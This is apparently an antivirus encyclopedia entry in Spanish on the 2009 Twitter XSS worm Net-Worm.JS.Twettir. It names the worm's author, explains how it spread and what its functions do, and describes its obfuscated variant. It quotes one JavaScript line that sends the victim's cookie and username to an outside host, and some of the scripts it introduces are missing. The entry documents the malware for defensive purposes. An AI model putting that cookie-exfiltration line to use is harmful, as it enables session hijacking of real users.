Detección agregada	15 abr 2009
Actualización lanzada	15 abr 2009 22:32 GMT
Descripción agregada	22 abr 2009

Detalles técnicos

Familia de gusanos XSS que se difundieron en la red social Twitter durante abril de 2009. Para reproducirse, usan vulnerabilidades XSS. Su autor es el norteamericano Michael “Mikeyy" Mooney, de 17 años.

El gusano utilizaba las vulnerabilidades en el software de Twitter que permitían realizar ataques del tipo “scripting entre sitios” (XSS) y modificar las páginas de las cuentas de los usuarios. El contagio se realizaba al visitar una página modificada en el sitio Twitter o al seguir un enlace contenido en un mensaje falso enviado en nombre de un usuario de Twitter. En estas situaciones se usaba un escenario malicioso JavaScript.

Las principales funciones del gusano son tres:

• XHConn - que usa la función estándar XMLHttpRequest() de llamadas ajax;
• Urlencode – que usa la función estándar encodeURIComponent() para codificar URL;
• Wait – que es la que contiene las funciones maliciosas.

Net-Worm.JS.Twettir.g es una variante “enmarañada” (obfuscated).
Se inicia la ejecución del script x.php en la etiqueta img, a la cual se transmite los parámetros cookies y username del usuario actual:

document.write("<img src=' http://content.ireel.com/j.php?c=" + cookie + "&username=" + username + "'>");

Además, en nombre del usuario actual, mediante llamada POST se envía una notificación al usuario titular del id = 30685046 que contiene el mensaje “You got me. :)” y el contenido del fichero cookies.

Esta variante del gusano modifica los siguientes parámetros del usuario, lo que provoca la adición de un enlace a los scripts maliciosos: user[url], user[profile_link_color], user[&user[url]. Se añade uno de los siguientes scripts:

Además, el gusano cambia los parámetros del usuario por los siguientes:

que hacen que se modifiquen el nombre y el fondo de la página del usuario infectado.